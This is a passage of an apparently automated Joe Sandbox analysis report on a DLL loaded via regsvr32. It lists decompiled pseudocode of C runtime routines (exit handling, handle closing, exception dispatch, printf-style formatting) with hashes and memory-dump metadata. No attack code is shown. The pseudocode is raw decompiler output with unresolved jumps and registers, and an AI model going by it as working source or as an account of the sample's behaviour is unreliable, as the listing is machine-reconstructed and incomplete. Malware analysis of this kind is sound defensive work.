                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 1646373207-1276376045
                                                                                • Opcode ID: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                                                • Instruction ID: e4a80e63a0f2da88ffbeef63518588180244462d530d99e82f7d88b2bbb28a1c
                                                                                • Opcode Fuzzy Hash: 13d0b91207a4789fb824e3953cfc7806df79015e4e72068d0de0f8a7d22cb74d
                                                                                • Instruction Fuzzy Hash: 9DF0AC32918A8292D625DB10F85836A7BF0FB89748F588135D69E42ABCDF7CD558CA04
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52480C80 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 41%
                                                                                			E00007FFA7FFA52480C80(signed int __ecx, void* __eflags, void* __rax, void* __r8, signed int _a8) {
				signed long long _v16;
				long _v24;
				void* _t57;
				signed long long _t59;

				_t57 = __rax;
				_a8 = __ecx;
				E00007FFA7FFA5247F900(_a8);
				if (_t57 == 0xffffffff) goto 0x52480d05;
				if (_a8 != 1) goto 0x52480cb3;
				if (( *( *0x5248e560 + 0xb8) & 0x00000001) != 0) goto 0x52480ccc;
				if (_a8 != 2) goto 0x52480cef;
				_t59 =  *0x5248e560;
				if (( *(_t59 + 0x60) & 0x00000001) == 0) goto 0x52480cef;
				E00007FFA7FFA5247F900(1);
				_v16 = _t59;
				E00007FFA7FFA5247F900(2);
				if (_v16 == _t59) goto 0x52480d05;
				E00007FFA7FFA5247F900(_a8);
				if (CloseHandle(??) == 0) goto 0x52480d0f;
				_v24 = 0;
				goto 0x52480d19;
				_v24 = GetLastError();
				E00007FFA7FFA5247F7D0(_a8, _t59);
				 *((char*)( *((intOrPtr*)(0x5248e560 + _t59 * 8)) + 8 + (_a8 & 0x0000001f) * 0x58)) = 0;
				if (_v24 == 0) goto 0x52480d60;
				E00007FFA7FFA5246AA70(_v24,  *((intOrPtr*)(0x5248e560 + _t59 * 8)));
				goto 0x52480d62;
				return 0;
			}







                                                                                0x7ffa52480c80
                                                                                0x7ffa52480c80
                                                                                0x7ffa52480c8c
                                                                                0x7ffa52480c95
                                                                                0x7ffa52480c9c
                                                                                0x7ffa52480cb1
                                                                                0x7ffa52480cb8
                                                                                0x7ffa52480cba
                                                                                0x7ffa52480cca
                                                                                0x7ffa52480cd1
                                                                                0x7ffa52480cd6
                                                                                0x7ffa52480ce0
                                                                                0x7ffa52480ced
                                                                                0x7ffa52480cf3
                                                                                0x7ffa52480d03
                                                                                0x7ffa52480d05
                                                                                0x7ffa52480d0d
                                                                                0x7ffa52480d15
                                                                                0x7ffa52480d1d
                                                                                0x7ffa52480d44
                                                                                0x7ffa52480d4e
                                                                                0x7ffa52480d54
                                                                                0x7ffa52480d5e
                                                                                0x7ffa52480d66

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast__doserrno_dosmaperr_free_osfhnd
                                                                                • String ID:
                                                                                • API String ID: 1551955814-0
                                                                                • Opcode ID: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                                                • Instruction ID: 07446f12e9158c8061d6d600c8db2182e6a1ff8aa61aa2fcf6e7db32a74040b4
                                                                                • Opcode Fuzzy Hash: 539147ec8a9783b9fa5ff2985af3543efd94603151f732987cc3c022e13e7d90
                                                                                • Instruction Fuzzy Hash: 45216031A2C68696E6649B14EC5123A77F1FB83354F1C8235E67D466EDDFADE802CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52461000 Relevance: 6.0, APIs: 4, Instructions: 47threadtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: FormatLocaleThread$DateTime
                                                                                • String ID:
                                                                                • API String ID: 3587784874-0
                                                                                • Opcode ID: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                                                • Instruction ID: f256fba073df8947ce29dfd7405e5f9f5422411c9e29fb085526eee9b4219521
                                                                                • Opcode Fuzzy Hash: 6ab24f3c8d7cd050487db91c395009c2fe45c414da0b1ba1062a45228bb8b770
                                                                                • Instruction Fuzzy Hash: 3711C13160878086E7208F64F84015AB7E0FB4ABA4F588734EBAD57B98CF7CD1418B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52474960 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 175COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 35%
                                                                                			E00007FFA7FFA52474960(void* __ecx, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int _a40, intOrPtr _a48, long long _a56, long long _a64) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				char _v60;
				char _v64;
				signed int _v72;
				char _v80;
				char _v88;
				long long _v96;
				intOrPtr _v104;
				long long _v112;
				long long _v120;
				long long _v128;
				signed int _v136;
				void* _t106;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				long long _t153;
				signed int _t161;
				signed int _t165;
				long long _t166;
				long long _t169;
				long long _t170;
				intOrPtr _t174;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_t153 = _a8;
				if ( *_t153 != 0x80000003) goto 0x52474990;
				goto 0x52474cc6;
				0x52464000();
				if ( *((long long*)(_t153 + 0xe0)) == 0) goto 0x52474a33;
				0x52464000();
				_v56 = _t153;
				E00007FFA7FFA52463D00(_t106);
				if ( *((intOrPtr*)(_v56 + 0xe0)) == _t153) goto 0x52474a33;
				if ( *_a8 == 0xe0434f4d) goto 0x52474a33;
				if ( *_a8 == 0xe0434352) goto 0x52474a33;
				_v120 = _a64;
				_v128 = _a56;
				_v136 = _a40;
				if (E00007FFA7FFA5246E9B0(_a8, _a16, _a24, _a32) == 0) goto 0x52474a33;
				goto 0x52474cc6;
				if ( *((intOrPtr*)(_a40 + 0xc)) == 0) goto 0x52474a43;
				goto 0x52474a48;
				E00007FFA7FFA5246CF80(_a40);
				_v120 = _a32;
				_v128 =  &_v60;
				_t161 =  &_v64;
				_v136 = _t161;
				r9d = _a48;
				r8d = _a56;
				E00007FFA7FFA5246EA30(_a16, _a40);
				_v72 = _t161;
				_v64 = _v64 + 1;
				_v72 = _v72 + 0x14;
				if (_v64 - _v60 >= 0) goto 0x52474cc6;
				if (_a48 -  *_v72 < 0) goto 0x52474c2b;
				_t165 = _v72;
				if (_a48 -  *((intOrPtr*)(_t165 + 4)) > 0) goto 0x52474c2b;
				_t117 = E00007FFA7FFA5246E680( *((intOrPtr*)(_t165 + 4)), _t165);
				_t166 = _t165 +  *((intOrPtr*)(_v72 + 0x10));
				if ( *((intOrPtr*)(_t166 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0x52474b53;
				_t118 = E00007FFA7FFA5246E680(_t117, _t166);
				_v48 = _t166;
				_t119 = E00007FFA7FFA5246E680(_t118, _t166);
				_t169 = _v48 +  *((intOrPtr*)(_t166 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
				_v40 = _t169;
				goto 0x52474b5f;
				_v40 = 0;
				if (_v40 == 0) goto 0x52474bff;
				_t120 = E00007FFA7FFA5246E680(_t119, _t169);
				_t170 = _t169 +  *((intOrPtr*)(_v72 + 0x10));
				if ( *((intOrPtr*)(_t170 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0x52474be3;
				_t121 = E00007FFA7FFA5246E680(_t120, _t170);
				_v32 = _t170;
				E00007FFA7FFA5246E680(_t121, _t170);
				_v24 = _v32 +  *((intOrPtr*)(_t170 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
				goto 0x52474bef;
				_v24 = 0;
				_t174 = _v24;
				if ( *((char*)(_t174 + 0x10)) != 0) goto 0x52474c2b;
				E00007FFA7FFA5246E680( *((char*)(_t174 + 0x10)), _t174);
				if (( *(_t174 +  *((intOrPtr*)(_v72 + 0x10)) + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14) & 0x00000040) == 0) goto 0x52474c30;
				goto L1;
				__eax = E00007FFA7FFA5246E680(__eax, __rax);
				_v72 =  *((intOrPtr*)(_v72 + 0x10));
				__rax = __rax +  *((intOrPtr*)(_v72 + 0x10));
				_v72 =  *((intOrPtr*)(_v72 + 0xc)) - 1;
				__rcx = ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
				__rax = __rax + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
				__eflags = __rax;
				_v80 = 0;
				_v88 = 1;
				__rcx = _a64;
				_v96 = _a64;
				_v104 = _a56;
				__rcx = _v72;
				_v112 = _v72;
				_v120 = 0;
				_v128 = __rax;
				__rax = _a40;
				_v136 = _a40;
				__r9 = _a32;
				__r8 = _a24;
				__rdx = _a16;
				__rcx = _a8;
				__eax = E00007FFA7FFA52475180(__edi, __esi, __esp, __eflags, _a8, _a16, _a24, _a32);
				goto L1;
				return __eax;
			}
































                                                                                0x7ffa52474960
                                                                                0x7ffa52474965
                                                                                0x7ffa5247496a
                                                                                0x7ffa5247496f
                                                                                0x7ffa5247497b
                                                                                0x7ffa52474989
                                                                                0x7ffa5247498b
                                                                                0x7ffa52474990
                                                                                0x7ffa5247499d
                                                                                0x7ffa524749a3
                                                                                0x7ffa524749a8
                                                                                0x7ffa524749ad
                                                                                0x7ffa524749be
                                                                                0x7ffa524749ce
                                                                                0x7ffa524749de
                                                                                0x7ffa524749e8
                                                                                0x7ffa524749f4
                                                                                0x7ffa52474a00
                                                                                0x7ffa52474a2c
                                                                                0x7ffa52474a2e
                                                                                0x7ffa52474a3f
                                                                                0x7ffa52474a41
                                                                                0x7ffa52474a43
                                                                                0x7ffa52474a50
                                                                                0x7ffa52474a5a
                                                                                0x7ffa52474a5f
                                                                                0x7ffa52474a64
                                                                                0x7ffa52474a69
                                                                                0x7ffa52474a71
                                                                                0x7ffa52474a89
                                                                                0x7ffa52474a8e
                                                                                0x7ffa52474a9b
                                                                                0x7ffa52474aa8
                                                                                0x7ffa52474ab5
                                                                                0x7ffa52474ac9
                                                                                0x7ffa52474acf
                                                                                0x7ffa52474ade
                                                                                0x7ffa52474ae4
                                                                                0x7ffa52474af2
                                                                                0x7ffa52474b0b
                                                                                0x7ffa52474b0d
                                                                                0x7ffa52474b12
                                                                                0x7ffa52474b17
                                                                                0x7ffa52474b46
                                                                                0x7ffa52474b49
                                                                                0x7ffa52474b51
                                                                                0x7ffa52474b53
                                                                                0x7ffa52474b68
                                                                                0x7ffa52474b6e
                                                                                0x7ffa52474b7c
                                                                                0x7ffa52474b95
                                                                                0x7ffa52474b97
                                                                                0x7ffa52474b9c
                                                                                0x7ffa52474ba4
                                                                                0x7ffa52474bd9
                                                                                0x7ffa52474be1
                                                                                0x7ffa52474be3
                                                                                0x7ffa52474bef
                                                                                0x7ffa52474bfd
                                                                                0x7ffa52474bff
                                                                                0x7ffa52474c29
                                                                                0x7ffa52474c2b
                                                                                0x7ffa52474c30
                                                                                0x7ffa52474c3a
                                                                                0x7ffa52474c3e
                                                                                0x7ffa52474c4b
                                                                                0x7ffa52474c4e
                                                                                0x7ffa52474c52
                                                                                0x7ffa52474c52
                                                                                0x7ffa52474c55
                                                                                0x7ffa52474c5a
                                                                                0x7ffa52474c5f
                                                                                0x7ffa52474c67
                                                                                0x7ffa52474c73
                                                                                0x7ffa52474c77
                                                                                0x7ffa52474c7c
                                                                                0x7ffa52474c81
                                                                                0x7ffa52474c8a
                                                                                0x7ffa52474c8f
                                                                                0x7ffa52474c97
                                                                                0x7ffa52474c9c
                                                                                0x7ffa52474ca4
                                                                                0x7ffa52474cac
                                                                                0x7ffa52474cb4
                                                                                0x7ffa52474cbc
                                                                                0x7ffa52474cc1
                                                                                0x7ffa52474ccd

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 0-2084237596
                                                                                • Opcode ID: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                                                • Instruction ID: d1bc665d07e24bb357223e1130724a6ec17e266754547efdccbead5881b3be35
                                                                                • Opcode Fuzzy Hash: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                                                • Instruction Fuzzy Hash: 1791FB3260DB8186DA64DB45E49037AB3B0FBC5B44F198436EA9E43B99DF7CE442CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247C6F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 19%
                                                                                			E00007FFA7FFA5247C6F8(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
				signed int _t217;
				signed char _t222;
				intOrPtr _t257;
				signed int _t332;
				signed int _t333;
				signed long long _t336;
				intOrPtr* _t359;
				signed long long _t384;

				_t332 = __rax;
				_a116 = 0x10;
				asm("bts eax, 0xf");
				_a708 = 7;
				_a708 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0x5247c754;
				_a84 = 0x30;
				_a85 = _a708 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0x5247c777;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0x5247c79e;
				E00007FFA7FFA52471EA0( &_a1112);
				_a824 = _t332;
				goto 0x5247c84b;
				if ((_a80 & 0x00001000) == 0) goto 0x5247c7c5;
				E00007FFA7FFA52471EA0( &_a1112);
				_a824 = _t332;
				goto 0x5247c84b;
				if ((_a80 & 0x00000020) == 0) goto 0x5247c810;
				if ((_a80 & 0x00000040) == 0) goto 0x5247c7f6;
				_t333 = E00007FFA7FFA52471E40( &_a1112);
				_a824 = _t333;
				goto 0x5247c80e;
				E00007FFA7FFA52471E40( &_a1112);
				_a824 = _t333;
				goto 0x5247c84b;
				if ((_a80 & 0x00000040) == 0) goto 0x5247c834;
				E00007FFA7FFA52471E40( &_a1112);
				_a824 = _t333;
				goto 0x5247c84b;
				E00007FFA7FFA52471E40( &_a1112);
				_a824 = _t333;
				if ((_a80 & 0x00000040) == 0) goto 0x5247c882;
				if (_a824 >= 0) goto 0x5247c882;
				_a832 =  ~_a824;
				asm("bts eax, 0x8");
				goto 0x5247c892;
				_t336 = _a824;
				_a832 = _t336;
				if ((_a80 & 0x00008000) != 0) goto 0x5247c8c7;
				if ((_a80 & 0x00001000) != 0) goto 0x5247c8c7;
				_a832 = _a832 & _t336;
				if (_a116 >= 0) goto 0x5247c8d8;
				_a116 = 1;
				goto 0x5247c8f5;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0x5247c8f5;
				_a116 = 0x200;
				if (_a832 != 0) goto 0x5247c908;
				_a92 = 0;
				_a64 =  &_a687;
				_t217 = _a116;
				_a116 = _a116 - 1;
				if (_t217 > 0) goto 0x5247c936;
				if (_a832 == 0) goto 0x5247c9d3;
				_a1040 = _a72;
				_a816 = _t217 / _a1040 + 0x30;
				_a1048 = _a72;
				if (_a816 - 0x39 <= 0) goto 0x5247c9b2;
				_t222 = _a816 + _a708;
				_a816 = _t222;
				 *_a64 = _a816 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0x5247c915;
				_a104 = _t222;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0x5247ca31;
				if (_a104 == 0) goto 0x5247ca12;
				if ( *_a64 == 0x30) goto 0x5247ca31;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0x5247cc6e;
				if ((_a80 & 0x00000040) == 0) goto 0x5247ca95;
				if ((_a80 & 0x00000100) == 0) goto 0x5247ca63;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0x5247ca95;
				if ((_a80 & 0x00000001) == 0) goto 0x5247ca7d;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0x5247ca95;
				if ((_a80 & 0x00000002) == 0) goto 0x5247ca95;
				_a84 = 0x20;
				_a92 = 1;
				_a840 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0x5247cad5;
				E00007FFA7FFA5247CF10(0x20, _a840, _a1088,  &_a688);
				E00007FFA7FFA5247CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
				if ((_a80 & 0x00000008) == 0) goto 0x5247cb27;
				if ((_a80 & 0x00000004) != 0) goto 0x5247cb27;
				E00007FFA7FFA5247CF10(0x30, _a840, _a1088,  &_a688);
				if (_a76 == 0) goto 0x5247cc1d;
				if (_a104 <= 0) goto 0x5247cc1d;
				_a872 = 0;
				_a848 = _a64;
				_a856 = _a104;
				_a856 = _a856 - 1;
				if (_a856 == 0) goto 0x5247cc1b;
				_a1056 =  *_a848 & 0x0000ffff;
				r9d = _a1056 & 0x0000ffff;
				r8d = 6;
				_a872 = E00007FFA7FFA5247B530( &_a860,  &_a864, _a1088);
				_a848 =  &(_a848[1]);
				if (_a872 != 0) goto 0x5247cbe5;
				if (_a860 != 0) goto 0x5247cbf2;
				_a688 = 0xffffffff;
				goto 0x5247cc1b;
				E00007FFA7FFA5247CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
				goto 0x5247cb60;
				goto 0x5247cc3b;
				E00007FFA7FFA5247CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
				if (_a688 < 0) goto 0x5247cc6e;
				if ((_a80 & 0x00000004) == 0) goto 0x5247cc6e;
				E00007FFA7FFA5247CF10(0x20, _a840, _a1088,  &_a688);
				if (_a96 == 0) goto 0x5247cc8e;
				0x52465330();
				_a96 = 0;
				goto 0x5247b99c;
				if (_a704 == 0) goto 0x5247ccb4;
				if (_a704 == 7) goto 0x5247ccb4;
				_a1060 = 0;
				goto 0x5247ccbf;
				_a1060 = 1;
				_t257 = _a1060;
				_a876 = _t257;
				if (_a876 != 0) goto 0x5247cd05;
				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t359;
				r9d = 0;
				r8d = 0x8f5;
				0x5246b3b0();
				if (_t257 != 1) goto 0x5247cd05;
				asm("int3");
				if (_a876 != 0) goto 0x5247cd61;
				0x5246ab30();
				 *_t359 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E00007FFA7FFA5246BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a912 = 0xffffffff;
				E00007FFA7FFA52466800( &_a120);
				goto 0x5247cd80;
				_a916 = _a688;
				E00007FFA7FFA52466800( &_a120);
				return E00007FFA7FFA52463280(_a916, 2, 2, _a1064 ^ _t384, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}











                                                                                0x7ffa5247c6f8
                                                                                0x7ffa5247c6f8
                                                                                0x7ffa5247c704
                                                                                0x7ffa5247c70c
                                                                                0x7ffa5247c719
                                                                                0x7ffa5247c724
                                                                                0x7ffa5247c737
                                                                                0x7ffa5247c739
                                                                                0x7ffa5247c748
                                                                                0x7ffa5247c74c
                                                                                0x7ffa5247c756
                                                                                0x7ffa5247c769
                                                                                0x7ffa5247c76f
                                                                                0x7ffa5247c782
                                                                                0x7ffa5247c78c
                                                                                0x7ffa5247c791
                                                                                0x7ffa5247c799
                                                                                0x7ffa5247c7a9
                                                                                0x7ffa5247c7b3
                                                                                0x7ffa5247c7b8
                                                                                0x7ffa5247c7c0
                                                                                0x7ffa5247c7ce
                                                                                0x7ffa5247c7d9
                                                                                0x7ffa5247c7e8
                                                                                0x7ffa5247c7ec
                                                                                0x7ffa5247c7f4
                                                                                0x7ffa5247c7fe
                                                                                0x7ffa5247c806
                                                                                0x7ffa5247c80e
                                                                                0x7ffa5247c819
                                                                                0x7ffa5247c823
                                                                                0x7ffa5247c82a
                                                                                0x7ffa5247c832
                                                                                0x7ffa5247c83c
                                                                                0x7ffa5247c843
                                                                                0x7ffa5247c854
                                                                                0x7ffa5247c85f
                                                                                0x7ffa5247c86c
                                                                                0x7ffa5247c878
                                                                                0x7ffa5247c880
                                                                                0x7ffa5247c882
                                                                                0x7ffa5247c88a
                                                                                0x7ffa5247c89d
                                                                                0x7ffa5247c8aa
                                                                                0x7ffa5247c8bf
                                                                                0x7ffa5247c8cc
                                                                                0x7ffa5247c8ce
                                                                                0x7ffa5247c8d6
                                                                                0x7ffa5247c8df
                                                                                0x7ffa5247c8eb
                                                                                0x7ffa5247c8ed
                                                                                0x7ffa5247c8fe
                                                                                0x7ffa5247c900
                                                                                0x7ffa5247c910
                                                                                0x7ffa5247c915
                                                                                0x7ffa5247c91f
                                                                                0x7ffa5247c925
                                                                                0x7ffa5247c930
                                                                                0x7ffa5247c93b
                                                                                0x7ffa5247c95e
                                                                                0x7ffa5247c96a
                                                                                0x7ffa5247c997
                                                                                0x7ffa5247c9a9
                                                                                0x7ffa5247c9ab
                                                                                0x7ffa5247c9bf
                                                                                0x7ffa5247c9c9
                                                                                0x7ffa5247c9ce
                                                                                0x7ffa5247c9e0
                                                                                0x7ffa5247c9ec
                                                                                0x7ffa5247c9fc
                                                                                0x7ffa5247ca03
                                                                                0x7ffa5247ca10
                                                                                0x7ffa5247ca1a
                                                                                0x7ffa5247ca24
                                                                                0x7ffa5247ca2d
                                                                                0x7ffa5247ca36
                                                                                0x7ffa5247ca45
                                                                                0x7ffa5247ca52
                                                                                0x7ffa5247ca54
                                                                                0x7ffa5247ca59
                                                                                0x7ffa5247ca61
                                                                                0x7ffa5247ca6c
                                                                                0x7ffa5247ca6e
                                                                                0x7ffa5247ca73
                                                                                0x7ffa5247ca7b
                                                                                0x7ffa5247ca86
                                                                                0x7ffa5247ca88
                                                                                0x7ffa5247ca8d
                                                                                0x7ffa5247caa5
                                                                                0x7ffa5247cab5
                                                                                0x7ffa5247cad0
                                                                                0x7ffa5247caee
                                                                                0x7ffa5247cafc
                                                                                0x7ffa5247cb07
                                                                                0x7ffa5247cb22
                                                                                0x7ffa5247cb2c
                                                                                0x7ffa5247cb37
                                                                                0x7ffa5247cb3d
                                                                                0x7ffa5247cb4d
                                                                                0x7ffa5247cb59
                                                                                0x7ffa5247cb70
                                                                                0x7ffa5247cb79
                                                                                0x7ffa5247cb8a
                                                                                0x7ffa5247cb92
                                                                                0x7ffa5247cb9b
                                                                                0x7ffa5247cbb6
                                                                                0x7ffa5247cbc9
                                                                                0x7ffa5247cbd9
                                                                                0x7ffa5247cbe3
                                                                                0x7ffa5247cbe5
                                                                                0x7ffa5247cbf0
                                                                                0x7ffa5247cc11
                                                                                0x7ffa5247cc16
                                                                                0x7ffa5247cc1b
                                                                                0x7ffa5247cc36
                                                                                0x7ffa5247cc43
                                                                                0x7ffa5247cc4e
                                                                                0x7ffa5247cc69
                                                                                0x7ffa5247cc74
                                                                                0x7ffa5247cc80
                                                                                0x7ffa5247cc85
                                                                                0x7ffa5247cc8e
                                                                                0x7ffa5247cc9b
                                                                                0x7ffa5247cca5
                                                                                0x7ffa5247cca7
                                                                                0x7ffa5247ccb2
                                                                                0x7ffa5247ccb4
                                                                                0x7ffa5247ccbf
                                                                                0x7ffa5247ccc6
                                                                                0x7ffa5247ccd5
                                                                                0x7ffa5247ccd7
                                                                                0x7ffa5247ccde
                                                                                0x7ffa5247cce3
                                                                                0x7ffa5247cce6
                                                                                0x7ffa5247ccf8
                                                                                0x7ffa5247cd00
                                                                                0x7ffa5247cd02
                                                                                0x7ffa5247cd0d
                                                                                0x7ffa5247cd0f
                                                                                0x7ffa5247cd14
                                                                                0x7ffa5247cd1a
                                                                                0x7ffa5247cd23
                                                                                0x7ffa5247cd3e
                                                                                0x7ffa5247cd43
                                                                                0x7ffa5247cd53
                                                                                0x7ffa5247cd5f
                                                                                0x7ffa5247cd68
                                                                                0x7ffa5247cd74
                                                                                0x7ffa5247cd97

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: get_int64_arg
                                                                                • String ID: 0$9
                                                                                • API String ID: 1967237116-1975997740
                                                                                • Opcode ID: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                                                • Instruction ID: 57e204704506def0d18eac6b412e6b962d8982ad7a5a7fda6440501a19c43717
                                                                                • Opcode Fuzzy Hash: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                                                • Instruction Fuzzy Hash: 0441D27360DAC18BE7758B19E8813AAB7F4F785750F184125E79C8AA88DBBCD545CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247E70C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 23%
